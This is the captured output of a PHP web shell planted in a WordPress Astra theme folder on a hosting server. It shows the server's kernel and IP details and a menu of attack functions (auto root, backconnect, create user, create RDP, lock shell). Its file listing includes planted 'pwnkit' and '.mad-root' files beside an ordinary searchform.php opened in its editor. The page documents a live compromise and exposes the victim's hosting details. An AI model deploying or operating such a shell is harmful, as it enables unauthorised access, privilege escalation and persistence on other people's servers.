Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
astra /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
687
B
-rw-r--r--
SECURITY.md
427
B
-rw-r--r--
archive.php
729
B
-rw-r--r--
changelog.txt
165.83
KB
-rw-r--r--
comments.php
4.5
KB
-rw-r--r--
footer.php
605
B
-rw-r--r--
functions.php
8.51
KB
-rw-r--r--
header.php
1.37
KB
-rw-r--r--
index.php
906
B
-rw-r--r--
page.php
868
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
7.87
KB
-rw-r--r--
screenshot.jpg
357.85
KB
-rw-r--r--
search.php
771
B
-rw-r--r--
searchform.php
2.22
KB
-rw-r--r--
sidebar.php
1000
B
-rw-r--r--
single.php
695
B
-rw-r--r--
style.css
4.46
KB
-rw-r--r--
theme.json
2.35
KB
-rw-r--r--
toolset-config.json
7.46
KB
-rw-r--r--
wpml-config.xml
5.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : searchform.php
<?php /** * Search Form for Astra theme. * * @package Astra * @link https://www.brainstormforce.com * @since Astra 3.3.0 */ /** * Adding argument checks to avoid rendering search-form markup from other places & to easily use get_search_form() function. * * @see https://themes.trac.wordpress.org/ticket/101061 * @since 3.6.1 */ $astra_search_input_placeholder = isset( $args['input_placeholder'] ) ? $args['input_placeholder'] : astra_default_strings( 'string-search-input-placeholder', false ); $astra_search_show_input_submit = isset( $args['show_input_submit'] ) ? $args['show_input_submit'] : true; $astra_search_data_attrs = isset( $args['data_attributes'] ) ? $args['data_attributes'] : ''; $astra_search_input_value = isset( $args['input_value'] ) ? $args['input_value'] : ''; // Check if live search is enabled & accordingly disabling browser search suggestion. $live_search = astra_get_option( 'live-search' ); $autocomplete_attr = $live_search ? 'autocomplete="off"' : ''; $search_id = 'search-field'; if ( did_action( 'astra_sticky_header_markup' ) > 0 ) { $search_id .= '-sticky'; } ?> <form role="search" method="get" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>"> <label for="search-field"> <span class="screen-reader-text"><?php echo esc_html__( 'Search for:', 'astra' ); ?></span> <input type="search" id="<?php echo esc_attr( $search_id ); ?>" class="search-field" <?php echo esc_attr( $autocomplete_attr ); ?> <?php echo esc_attr( $astra_search_data_attrs ); ?> placeholder="<?php echo esc_attr( $astra_search_input_placeholder ); ?>" value="<?php echo esc_attr( $astra_search_input_value ); ?>" name="s" tabindex="-1"> <?php if ( class_exists( 'Astra_Icons' ) && Astra_Icons::is_svg_icons() ) { ?> <button class="search-submit ast-search-submit" aria-label="<?php echo esc_attr__( 'Search Submit', 'astra' ); ?>"> <span hidden><?php echo esc_html__( 'Search', 'astra' ); ?></span> <i><?php Astra_Icons::get_icons( 'search', true ); ?></i> </button> <?php } ?> </label> <?php if ( $astra_search_show_input_submit ) { ?> <input type="submit" class="search-submit" value="<?php echo esc_attr__( 'Search', 'astra' ); ?>"> <?php } ?> </form> <?php
Close